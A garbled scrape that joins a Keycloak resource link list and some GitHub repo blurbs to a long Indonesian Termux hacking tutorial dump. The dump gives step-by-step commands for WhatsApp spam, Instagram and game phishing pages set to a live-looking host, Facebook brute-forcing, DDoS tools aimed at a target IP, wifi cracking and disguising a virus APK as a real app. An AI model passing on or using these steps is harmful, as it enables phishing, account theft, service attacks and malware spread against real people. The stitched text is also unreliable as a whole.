* [Authentication & user management is hard](https://eclipsesource.com/blogs/2018/01/11/authenticating-reverse-proxy-with-keycloak/)
* [Securing Nginx with Keycloak](https://edhull.co.uk/blog/2018-06-06/keycloak-nginx)
* [Secure kibana dashboards using keycloak](https://aboullaite.me/secure-kibana-keycloak/)
* [Configuring NGINX for OAuth/OpenID Connect SSO with Keycloak/Red Hat SSO](https://developers.redhat.com/blog/2018/10/08/configuring-nginx-keycloak-oauth-oidc/)
* [Keycloak Clustering Setup and Configuration Examples](https://github.com/fit2anything/keycloak-cluster-setup-and-configuration)
* [MicroProfile JWT with Keycloak](https://kodnito.com/posts/microprofile-jwt-with-keycloak/)
* [Keycloak Essentials](https://medium.com/keycloak/keycloak-essentials-86254b2f1872)
* [SSO-session failover with Keycloak and AWS S3](https://medium.com/@georgijsr/sso-session-failover-with-keycloak-and-aws-s3-e0b1db985e12)
* [KTOR and Keycloak: authentication with OpenId](https://medium.com/slickteam/ktor-and-keycloak-authentication-with-openid-ecd415d7a62e)
* [Keycloak: Core concepts of open source identity and access management](https://developers.redhat.com/blog/2019/12/11/keycloak-core-concepts-of-open-source-identity-and-access-management)
* [Who am I? Keycloak Impersonation API](https://blog.softwaremill.com/who-am-i-keycloak-impersonation-api-bfe7acaf051a)
* [Setup Keycloak Server on Ubuntu 18.04](https://medium.com/@hasnat.saeed/setup-keycloak-server-on-ubuntu-18-04-ed8c7c79a2d9)
* [Getting started with Keycloak](https://robferguson.org/blog/2019/12/24/getting-started-with-keycloak/)
* [Angular, OpenID Connect and Keycloak](https://robferguson.org/blog/2019/12/29/angular-openid-connect-keycloak/)
* [Angular, OAuth 2.0 Scopes and Keycloak](https://robferguson.org/blog/2019/12/31/angular-oauth2-keycloak/)
* [Keycloak, Flowable and OpenLDAP](https://robferguson.org/blog/2020/01/03/keycloak-flowable-and-openldap/)
* [How to exchange token from an external provider to a keycloak token](https://www.mathieupassenaud.fr/token-exchange-keycloak/)
* [Building an Event Listener SPI (Plugin) for Keycloak](https://dev.to/adwaitthattey/building-an-event-listener-spi-plugin-for-keycloak-2044)
* [Keycloak user migration – connect your legacy authentication system to Keycloak](https://codesoapbox.dev/keycloak-user-migration/)
* [Keycloak Authentication and Authorization in GraphQL](https://medium.com/@darahayes/keycloak-authentication-and-authorization-in-graphql-ad0a1685f7da)
* [Kong / Konga / Keycloak: securing API through OIDC](https://github.com/d4rkstar/kong-konga-keycloak)
* [KeyCloak: Custom Login theme](https://codehumsafar.wordpress.com/2018/09/11/keycloak-custom-login-theme/)
* [Keycloak: Use background color instead of background image in Custom Login theme](https://codehumsafar.wordpress.com/2018/09/21/keycloak-use-background-color-instead-of-background-image-in-custom-login-theme/)
* [How to turn off the Keycloak theme cache](https://keycloakthemes.com/blog/how-to-turn-off-the-keycloak-theme-cache)
* [How to add a custom field to the Keycloak registration page](https://keycloakthemes.com/blog/how-to-add-custom-field-keycloak-registration-page)
* [How to setup Sign in with Google using Keycloak](https://keycloakthemes.com/blog/how-to-setup-sign-in-with-google-using-keycloak)
* [How to sign in users on Keycloak using Github](https://keycloakthemes.com/blog/how-to-sign-in-users-on-keycloak-using-github)
* [Extending Keycloak SSO Capabilities with IBM Security Verify](https://community.ibm.com/community/user/security/blogs/jason-choi1/2020/06/10/extending-keycloak-sso-capabilities-with-ibm-secur)
* [AWS SAML based User Federation using Keycloak](https://medium.com/@karanbir.tech/aws-connect-saml-based-identity-provider-using-keycloak-9b3e6d0111e6)
* [AWS user account OpenID federation using Keycloak](https://medium.com/@karanbir.tech/aws-account-openid-federation-using-keycloak-40d22b952a43)
* [How to Run Keycloak in HA on Kubernetes](https://blog.sighup.io/keycloak-ha-on-kubernetes/)
* [How to create a Keycloak authenticator as a microservice?](https://medium.com/application-security/how-to-create-a-keycloak-authenticator-as-a-microservice-ad332e287b58)
* [keycloak.ch | Installing & Running Keycloak](https://keycloak.ch/keycloak-tutorials/tutorial-1-installing-and-running-keycloak/)
* [keycloak.ch | Configuring Token Exchange using the CLI](https://keycloak.ch/keycloak-tutorials/tutorial-token-exchange/)
* [keycloak.ch | Configuring WebAuthn](https://keycloak.ch/keycloak-tutorials/tutorial-webauthn/)
* [keycloak.ch | Configuring a SwissID integration](https://keycloak.ch/keycloak-tutorials/tutorial-swissid/)
* [Getting Started with Service Accounts in Keycloak](https://medium.com/@mihirrajdixit/getting-started-with-service-accounts-in-keycloak-c8f6798a0675)
* [Building cloud native apps: Identity and Access Management](https://dev.to/lukaszbudnik/building-cloud-native-apps-identity-and-access-management-1e5m)
* [X.509 user certificate authentication with Red Hat’s single sign-on technology](https://developers.redhat.com/blog/2021/02/19/x-509-user-certificate-authentication-with-red-hats-single-sign-on-technology)
* [Grafana OAuth with Keycloak and how to validate a JWT token](https://janikvonrotz.ch/2020/08/27/grafana-oauth-with-keycloak-and-how-to-validate-a-jwt-token/)
* [How to setup a Keycloak server with external MySQL database on AWS ECS Fargate in clustered mode](https://jbjerksetmyr.medium.com/how-to-setup-a-keycloak-server-with-external-mysql-database-on-aws-ecs-fargate-in-clustered-mode-9775d01cd317)
* [Extending Keycloak: adding API key authentication](http://www.zakariaamine.com/2019-06-14/extending-keycloak)
* [Extending Keycloak: using a custom email sender](http://www.zakariaamine.com/2019-07-14/extending-keycloak2)
* [Integrating Keycloak and OPA with Confluent](https://goraft.tech/2021/03/17/integrating-keycloak-and-opa-with-confluent.html)
* [UMA 2.0 : User Managed Access - how to use it with bash](https://blog.please-open.it/uma/)

## Talks

* [JDD2015 - Keycloak Open Source Identity and Access Management Solution](https://www.youtube.com/watch?v=TuEkj25lbd0)
* [2015 Using Tomcat and Keycloak in an iFrame](https://www.youtube.com/watch?v=nF_lw7uIxao)
* [2016 You've Got Microservices Now Secure Them](https://www.youtube.com/watch?v=SfVhqf-rMQY)
* [2016 Keycloak: Open Source Single Sign On - Sebastian Rose - AOE conf (German)](https://www.youtube.com/watch?v=wbKw0Bwyne4)
* [2016 Sécuriser ses applications back et front facilement avec Keycloak (French)](https://www.youtube.com/watch?v=bVidgluUcg0)
* [2016 Keycloak and Red Hat Mobile Application Platform](https://www.youtube.com/watch?v=4NBgiHM5aOA)
* [2016 Easily secure your Front and back applications with KeyCloak](https://www.youtube.com/watch?v=RGp4HUKikts)
* [2017 Easily secure your Spring Boot applications with Keycloak - Part 1](https://developers.redhat.com/video/youtube/vpgRTPFDHAw/)
* [2017 Easily secure your Spring Boot applications with Keycloak - Part 2](https://developers.redhat.com/video/youtube/O5ePCWON08Y/)
* [2018 How to secure your Spring Apps with Keycloak by Thomas Darimont @ Spring I/O 2018](https://www.youtube.com/watch?v=haHFoeWUj0w)
* [2018 DevNation Live | A Deep Dive into Keycloak](https://www.youtube.com/watch?v=ZxpY_zZ52kU)
* [2018 IDM Europe: WSO2 Identity Server vs. Keycloak (Dmitry Kann)](https://www.youtube.com/watch?v=hnjBiGsEDoU)
* [2018 JPrime|Building an effective identity and access management architecture with Keycloak (Sebastien Blanc)](https://www.youtube.com/watch?v=bMqcGkCvUVQ)
* [2018 WJAX| Sichere Spring-Anwendungen mit Keycloak](https://www.youtube.com/watch?v=6Z490EMcafs)
* [2019 Spring I/O | Secure your Spring Apps with Keycloak](https://www.youtube.com/watch?v=KrOd5wIkqls)
* [2019 DevoxxFR | Maitriser sa gestion de l'identité avec Keycloak (L. Benoit, T. Recloux, S. Blanc)](https://www.youtube.com/watch?v=0cziL__0-K8)
* [2019 DevConf | Fine - Grained Authorization with Keycloak SSO (Marek Posolda)](https://www.youtube.com/watch?v=yosg4St0iUw)
* [2019 VoxxedDays Minsk | Building an effective identity and access management architecture with Keycloak (Sebastien Blanc)](https://www.youtube.com/watch?v=RupQWmYhrLA)
* [2019 Single-Sign-On Authentifizierung mit dem Keycloak Identity Provider | jambit CoffeeTalk](https://www.youtube.com/watch?v=dnY6ORaFNY8)
* [2020 Keycloak Team | Keycloak Pitch](https://www.youtube.com/watch?v=GZTN_VXjoQw)
* [2020 Keycloak Team | Keycloak Overview](https://www.youtube.com/watch?v=duawSV69LDI)
* [2020 Please-open.it : oauth2 dans le monde des ops (French)](https://www.youtube.com/watch?v=S-9X50QajmY)

## Presentations

* [Keycloak 101](https://stevenolen.github.io/kc101-talk/#1)

## Video Playlists

* [Keycloak Identity and Access Management by Łukasz Budnik](https://www.youtube.com/playlist?list=PLPZal7ksxNs0mgScrJxrggEayV-TPZ9sA)
* [Keycloak by Niko Köbler](https://www.youtube.com/playlist?list=PLNn3plN7ZiaowUvKzKiJjYfWpp86u98iY)
* [Keycloak Playlist by hexaDefence](https://youtu.be/35bflT_zxXA)
* [Keycloak Tutorial Series by CodeLens](https://www.youtube.com/watch?v=Lr9WeIMtFow&list=PLeGNmkzI56BTjRxNGxUhh4k30FD_gy0pC)

## Clients

* [Official Keycloak Node.js Admin Client](https://github.com/keycloak/keycloak-admin-client/) ("Extremely Experimental")
* [Keycloak Node.js TypeScript Admin Client by Canner](https://github.com/Canner/keycloak-admin/)
* [Keycloak Go Client by Cloudtrust](https://github.com/cloudtrust/keycloak-client)
* [Keycloak Nest.js Admin Client by Relevant Fruit](https://github.com/relevantfruit/nestjs-keycloak-admin)

## Community Extensions

* [Keycloak Extensions List](https://www.keycloak.org/extensions.html)
* [Keycloak Benchmark Project](https://github.com/keycloak/keycloak-benchmark)
* [Keycloak: Link IdP Login with User Provider](https://github.com/ohioit/keycloak-link-idp-with-user)
* [Client Owner Manager: Control who can edit a client](https://github.com/cyclone-project/cyclone-client-registration)
* [Keycloak Proxy written in Go](https://github.com/gambol99/keycloak-proxy)
* [Script based ProtocolMapper extension for SAML](https://github.com/cloudtrust/keycloak-client-mappers)
* [Realm export REST resource by Cloudtrust](https://github.com/cloudtrust/keycloak-export)
* [Keycloak JDBC Ping Setup by moremagic](https://github.com/moremagic/keycloak-jdbc-ping)
* [SMS 2 Factor Authentication for Keycloak via AWS SNS](https://github.com/nickpack/keycloak-sms-authenticator-sns)
* [SMS 2 Factor Authentication for Keycloak via SMS by Alliander](https://github.com/Alliander/keycloak-sms-authenticator)
* [Identity Provider for vk.com](https://github.com/mrk08/keycloak-vk)
* [CAS Protocol Support](https://github.com/Doccrazy/keycloak-protocol-cas)
* [WS-FED Support](https://github.com/cloudtrust/keycloak-wsfed)
* [Keycloak Discord Support](https://github.com/wadahiro/keycloak-discord)
* [Keycloak Login with User Attribute](https://github.com/cnieg/keycloak-login-attribute)
* [zonaut/keycloak-extensions](https://github.com/zonaut/keycloak-extensions)
* [leroyguillaume/keycloak-bcrypt](https://github.com/leroyguillaume/keycloak-bcrypt)
* [SPI Authenticator in Nodejs](https://www.npmjs.com/package/keycloak-rest-authenticator)
* [Have I Been Pwned? Keycloak Password Policy](https://github.com/alexashley/keycloak-password-policy-have-i-been-pwned)
* [Keycloak Eventlistener for Google Cloud Pub Sub](https://github.com/acesso-io/keycloak-event-listener-gcpubsub)
* [Enforcing Password policy based on attributes of User Groups](https://github.com/sayedcsekuet/keycloak-user-group-based-password-policy)
* [Verify Email with Link or Code by hokumski](https://github.com/hokumski/keycloak-verifyemailwithcode)
* [Role-based Docker registry authentication](https://github.com/lifs-tools/keycloak-docker-role-mapper)
* [SCIM for keycloak](https://github.com/Captain-P-Goldfish/scim-for-keycloak)
* [Keycloak Kafka Module](https://github.com/SnuK87/keycloak-kafka)

## Integrations

* [Official Keycloak Node.js Connect Adapter](https://github.com/keycloak/keycloak-nodejs-connect)
* [Keycloak support for Aurelia](https://github.com/waynepennington/aurelia-keycloak)
* [Keycloak OAuth2 Auth for PHP](https://github.com/stevenmaguire/oauth2-keycloak)
* [Jenkins Keycloak Authentication Plugin](https://github.com/jenkinsci/keycloak-plugin)
* [Meteor Keycloak Accounts](https://github.com/mxab/meteor-keycloak)
* [HapiJS Keycloak Auth](https://github.com/felixheck/hapi-auth-keycloak)
* [zmartzone mod_auth_openidc for Apache 2.x](https://github.com/zmartzone/mod_auth_openidc)
* [Duo Security MFA Authentication for Keycloak](https://github.com/mulesoft-labs/keycloak-duo-spi)
* [Keycloak extension facilitating the use of FranceConnect](https://github.com/InseeFr/Keycloak-FranceConnect)
* [Ambassador Keycloak Support](https://www.getambassador.io/reference/idp-support/keycloak/)
* [Keycloak Python Client](https://github.com/akhilputhiry/keycloak-client)
* [Keycloak Terraform Provider](https://github.com/mrparkers/terraform-provider-keycloak)
* [Keycloak ADFS OpenID Connect](https://www.michaelboeynaems.com/keycloak-ADFS-OIDC.html)
* [React/NextJS Keycloak Bindings](https://github.com/panz3r/react-keycloak)
* [Keycloak Open-Shift integration](https://github.com/keycloak/openshift-integration)
* [Keycloak, Kong and Konga setup scripts (local development)](https://github.com/JaouherK/Kong-konga-Keycloak)
* [SSO for Keycloak and Nextcloud with SAML](https://stackoverflow.com/questions/48400812/sso-with-saml-keycloak-and-nextcloud)
* [Keycloak Connect GraphQL Adapter for Node.js](https://github.com/aerogear/keycloak-connect-graphql)
* [python-keycloak](https://github.com/marcospereirampj/python-keycloak)
* [Keycloak and privacyIDEA docker-compose (local development)](https://github.com/JaouherK/keycloak-privacyIdea)
* [Nerzal/gocloak Golang Keycloak API Package](https://github.com/Nerzal/gocloak)
* [Apple Social Identity Provider for Keycloak](https://github.com/BenjaminFavre/keycloak-apple-social-identity-provider)

## Quick demo Videos

* [Keycloak with istio envoy jwt-auth proxy](https://www.youtube.com/watch?v=wscX7JMfuBI)

## Themes

* [Community Keycloak Ionic Theme](https://github.com/lfryc/keycloak-ionic-theme)
* [A Keycloak theme based on the AdminLTE UI library](https://github.com/MAXIMUS-DeltaWare/adminlte-keycloak-theme)
* [GOV.UK Theme](https://github.com/UKHomeOffice/keycloak-theme-govuk)
* [Carbon Design](https://github.com/httpsOmkar/carbon-keycloak-theme)
* [Modern](https://keycloakthemes.com/themes/modern)
* [Adminlte](https://git.uptic.nl/uptic-public-projects/uptic-keyclock-theme-adminlte)
* [keycloakify: Create Keycloak themes using React](https://github.com/InseeFrLab/keycloakify)

## Docker

* [Official Keycloak Docker Images](https://github.com/jboss-dockerfiles/keycloak)
* [Keycloak Examples as Docker Image](https://hub.docker.com/r/jboss/keycloak-examples)
* [Keycloak Maven SDK for managing the entire lifecycle of your extensions with Docker](https://github.com/OpenPj/keycloak-docker-quickstart)

## Kubernetes

* [Deprecated Keycloak Helm Chart](https://github.com/codecentric/helm-charts/tree/master/charts/keycloak)
* [codecentric Keycloak Helm Chart](https://github.com/codecentric/helm-charts/tree/master/charts/keycloak)
* [Import / Export Keycloak Config](https://gist.github.com/unguiculus/19618ef57b1863145262191944565c9d)
* [keycloak-operator](https://github.com/keycloak/keycloak-operator)

## Tools

* [keycloakmigration: Manage your Keycloak configuration with code](https://github.com/klg71/keycloakmigration)
* [tool to autogenerate an OpenAPI Specification for Keycloak's Admin API](https://github.com/ccouzens/keycloak-openapi)
* [oidc-bash-client](https://github.com/please-openit/oidc-bash-client)
* [louketo-proxy (FKA Gatekeeper)](https://github.com/louketo/louketo-proxy)
* [keycloak-config-cli: Configuration as Code for Keycloak](https://github.com/adorsys/keycloak-config-cli)
* [Keycloak Pulumi](https://github.com/pulumi/pulumi-keycloak)
* [Keycloak on AWS](https://github.com/aws-samples/keycloak-on-aws)
* [aws-cdk construct library that allows you to create KeyCloak on AWS in TypeScript or Python](https://github.com/aws-samples/cdk-keycloak)
* [keycloak-scanner Python CLI](https://github.com/NeuronAddict/keycloak-scanner)

## Deployment Examples

* [Keycloak deployment with CDK on AWS with Fargate](https://github.com/aws-samples/cdk-keycloak)

## Example Projects

* [Examples from Keycloak Book: Keycloak - Identity and Access Management for Modern Applications](https://github.com/PacktPublishing/Keycloak-Identity-and-Access-Management-for-Modern-Applications)
* [Official Examples](https://github.com/keycloak/keycloak/tree/master/examples)
* [Keycloak Quickstarts](https://github.com/keycloak/keycloak-quickstarts)
* [Drupal 7.0 with Keycloak](https://gist.github.com/thomasdarimont/17fa146c4fb5440d7fc2ee6322ec392d)
* [Securing Realm Resources With Custom Roles](https://github.com/dteleguin/custom-admin-roles)
* [BeerCloak: a comprehensive KeyCloak extension example](https://github.com/dteleguin/beercloak)
* [KeyCloak Extensions: Securing Realm Resources With Custom Roles](https://github.com/dteleguin/custom-admin-roles)
* [Red Hat Single Sign-On Labs](https://github.com/RedHatWorkshops/red-hat-sso)
* [Spring Boot Keycloak Tutorial](https://github.com/sebastienblanc/spring-boot-keycloak-tutorial)
* [Custom Keycloak Docker Image of Computer Science House of RIT](https://github.com/ComputerScienceHouse/keycloak-docker)
* [Example of custom password hash SPI for Keycloak](https://github.com/pavelbogomolenko/keycloak-custom-password-hash)
* [Example for a custom http-client-provider with Proxy support](https://github.com/xiaoyvr/custom-http-client-provider)
* [Monitor your keycloak with prometheus](https://github.com/larscheid-schmitzhermes/keycloak-monitoring-prometheus)
* [Custom User Storage Provider .ear with jboss-cli setup](https://github.com/thomasdarimont/keycloak-user-storage-provider-demo)
* [Keycloak - Experimental extensions by Stian Thorgersen/Keycloak](https://github.com/stianst/keycloak-experimental)
* [Securing Spring Boot Admin & Actuator Endpoints with Keycloak](https://github.com/thomasdarimont/spring-boot-admin-keycloak-example)
* [A Keycloak Mobile Implementation using Angular v4 and Ionic v3](https://github.com/tomjackman/keyonic-v2)
* [Example for Securing Apps with Keycloak on Kubernetes](https://github.com/stianst/demo-kubernetes)
* [Example for Securing AspDotNet Core Apps with Keycloak](https://github.com/thomasdarimont/kc-dnc-demo)
* [Example for passing custom URL parameters to a Keycloak theme for dynamic branding](https://github.com/dteleguin/keycloak-dynamic-branding)
* [Angular Webapp secured with Keycloak](https://github.com/CodepediaOrg/bookmarks.dev)
* [Keycloak Theme Development Kit](https://github.com/anthonny/kit-keycloak-theme)
* [Keycloak Clustering examples](https://github.com/ivangfr/keycloak-clustered)
* [Keycloak Last Login Date Event Listener](https://github.com/ThoreKr/keycloak-last-login-event-listener)
* [Keycloak Project Example (Customizations, Extensions, Configuration)](https://github.com/thomasdarimont/keycloak-project-example)
* [Example of adding API Key authentication to Keycloak](https://github.com/zak905/keycloak-api-key-demo)

## Benchmarks

* [Gatling based Benchmark by @rvansa](https://github.com/rvansa/keycloak-benchmark)

## Help

* [Keycloak on Stackoverflow](https://stackoverflow.com/questions/tagged/keycloak)

## Commercial Offerings

* [Red Hat Single Sign-On](https://access.redhat.com/products/red-hat-single-sign-on)
* [INTEGSOFT UNIFIED USER CREDENTIALS WITH KEYCLOAK SSO](https://www.integsoft.cz/en/sso.html#what-is-sso)
* [JIRA SSO Plugin by codecentric](https://marketplace.atlassian.com/plugins/de.codecentric.atlassian.oidc.jira-oidc-plugin/server/overview)
* [Keycloak Competence Center by Inventage AG](https://keycloak.ch/)
* [Keycloak as a Service](https://www.cloud-iam.com)

## Miscellaneous

* [Find sites using Keycloak with google](https://www.google.de/search?q=inurl%3Aauth+inurl%3Arealms+inurl%3Aprotocol&oq=inurl%3A&client=ubuntu&sourceid=chrome&ie=UTF-8)
* [Keycloak Dev Bookmarks](http://bookmarks.dev/search?q=keycloak) - Use the tag [keycloak](https://www.bookmarks.dev/tagged/keycloak)
* [Use fail2ban to block brute-force attacks to keycloak server](https://gist.github.com/drmalex07/3eba8b98d0ac4a1e821e8e721b3e1816)
* [Pentest-Report Keycloak 8.0 Audit & Pentest 11.2019 by Cure53](https://cure53.de/pentest-report_keycloak.pdf)
* [Keycloak - CNCF Security SIG - Self Assessment](https://docs.google.com/document/d/14IIGliP3BWjdS-0wfOk3l_1AU8kyoSiLUzpPImsz4R0/edit#)

# License

[CC0 1.0](https://creativecommons.org/publicdomain/zero/1.0/)

To the extent possible under law, [Thomas Darimont](https://github.com/thomasdarimont) has waived all copyright and related or neighboring rights to this work.
koushikkothagal / Spring Github Login Starter: Starter Spring Boot project for OAuth login with GitHub
AhsenSaeed / FirebaseSocialAuthKotlin Android Firebase Login Flow of Facebook, Twitter, GitHub, Google.
akeeba / Sociallogin: Joomla!™ login and user account creation with Facebook, Google, GitHub etc. social media accounts
viniciusthiengo / Nosso Chate: Java Android project - building a Firebase Android chat.
Alisherka7 / Animated Login Form Avatar.github.io: No description available
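DaviesGit / Asset Manager: This asset management system features an original QR-code device-locating technique that makes it easy to locate the corresponding device through its QR code. The system supports purchasing, acceptance, account creation, borrowing, returning, scrapping and loss reporting of assets, and also supports batch import and export. Static demo of the site's interface: https://daviesgit.github.io/asset_manager/static/website/login/login.html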
AhapraxAhmed / Petcare: FurShield is a full-stack web app for pet care, enabling owners, vets, and shelters to manage pets, health records, appointments, and products. It features AI pet care assistance and Google/GitHub social login, offering a secure, responsive, and centralized pet management platform.
dickwall / Activator Play Oauth2 Scala: An example of OAuth2 for login auth and API usage against GitHub using Play and Scala
didinj / Node Facebook Twitter Google Github Login: Node, Express, Mongoose, Passport, Facebook, Twitter, Google and Github Authentication (Login)
pnp / Action Cli Login: GitHub action to log in to a tenant using CLI for Microsoft 365
sllumenikmati21 / MisteriusxxKUMPULAN CODE TERMUX LENGKAP | SPAM CHAT WHATSAPP || nggk usah nyepam gw -_* atau hp lu gw ledakin!!#@vms $ pkg update && pkg upgrade Setelah mengupdate dan mengupgrade termux ketikan perintah berikut : $ pkg install python2 (y/n pilih y) $ pkg install php (y/n pilih y) $ pkg install git (y/n pilih y) Setalah mengikuti perintah di atas waktu-nya kita clonning tool-nya : $ git clone https://github.com/siputra12/prank.git Setelah proses cloning selesai kita move on dari perintah di atas dan ketikan perintah ini : $ cd prank $ ls $ php wa.php Kemudian masukan Nomor WhatsApp yang kalian ingin spam contoh : 085710917169 kemudian enter pada pilihan y/n pilih y .. .welcome back to me catatan:).... #@vms " jngan lupa subcribe pak *VEMAS DARK* -_-... (:" "phising game" (mobile legends dan clash of clan) $apt update $apt upgrade -y $pkg install python2 -y $pkg install apache2 $pkg install php -y $pkg install git $git clone https://github.com/Senitopeng/PhisingGame $ls $cd PhisingGame $python2 phising.py *Gunain dengan bijak cuk -_-* Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py by: *Vdk* *~CARA SADAP WA~* *_SeNaNg-SeNaNg H4CK1NG MR.STAH_* $pkg update && pkg upgrade $pkg install git $pkg install curl $git clone https://github.com/AndriGanz/whatshack $cd whatshack $ls $sh whatshack.sh *~Jangan salah gunakan~* Tutorial termux Silahkan perdalami... D-tect tool Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py 2. cara uninstall tool termux rm -rf toolsnya 3. cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py 4. 
irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux ———————————— 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ Musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ Cara Mendengarkan Yotuube di termux $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya. 
Tutorial membuat virus seperti aplikasi aslinya Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug Here 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. 
Jadi deh ———————— Auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ Autoreaction Facebook git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction •TOOLS²TERMUX.P3 21.TOOLS SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py ============================= 22.TUTORIAL PHISING INSTAGRAM VIA TERMUX pkg update pkg upgrade pkg install python2 pkg install git clear git clone https://github.com/evait-secutiry/weeman.git cd ls cd weeman python2 weeman.py show set url http://dewopanel.host22.com/masuk.php set port 8080 set action_url http://dewopanel.host22.com/masuk.php run ============================= 23.TUTORIAL MENAMBAH FOLLOWERS&LIKE INSTAGRAM Kegunaan untuk menambah follower dan like ig pkg update pkg upgrade pkg install python2 pkg install ruby gem install lolcat pkg install git git clone https://github.com/Hanzelnutt/instabot cd instabot ls pip2 install -r requirements.txt bash instabot ============================= 24.TUTOR HACK WIFI KHUSUS ROOT apt update apt upgrade apt install git git clone https://github.com/esc0rtd3w/wifi-hacker ls cd wifi-hacker ls chmod +x wifi-hacker.sh ls ./wifi-hacker.sh ============================= 25.TOOLS xNOT_FOUND *VER1* apt update && apt upgrade pkg install git pkg install gem pkg install figlet gem install lolcat git clone https://github.com/hatakecnk/xNot_Found cd xNot_Found sh xNot_Found.sh ============================= 26.HACK FB Nih ada tutor buat lewat TERMUX buat hack FB apt update && apt upgrade apt install python apt install python2 apt install ruby apt install git apt install wget apt install curl pip2 install mechanize pip2 install requests git clone https://github.com/hnov7/mbf *tunggu hingga selesai,jika sudah selesai *silahkan buka tab baru atau new session lalu ketik : cd mbf 
python2 mbf.py ============================= 27.HACK GMAIL apt-get update && apt-get upgrade apt-get install git apt-get install python python-pip python-setuptools pip install scapy git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher< python setup.py install cd wifiphisher python wifiphisher ============================= 28.BERMAIN MOON-BUGGY pkg install moon-buggy moon-buggy ============================= 29.PERKIRAAN CUACA curl http://wttr.in/ (lokasi) ============================= 30.BROWSING DI TERMUX pkg install w3m w3m www.google.com Linknya bsa diubah ============================= [8/10 19.49] Yovis Si Wibub: Apt update Apt upgrade Apt install mechanize Apt install git git clone http://github.com/hnov7/mbf cd mbf python2 mbf. py Mbf tanpa username dan password. Jdi tinggl make aja [8/10 19.49] Yovis Si Wibub: --------------------------TOTUR MBF-----------------------$ pkg update && pkg upgrade $ pkg install python2 $ pip2 install mechanize $ git clone https://github.com/pirmansx/mbf Cara Menjalankannya : $ ls $ cd mbf $ python2 MBF.py [9/10 17.25] *~I⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟: Memper Cantik/Melihat V.Android Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat ✓ Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py ✓ Hack FB ngincer $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) ✓ Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip 
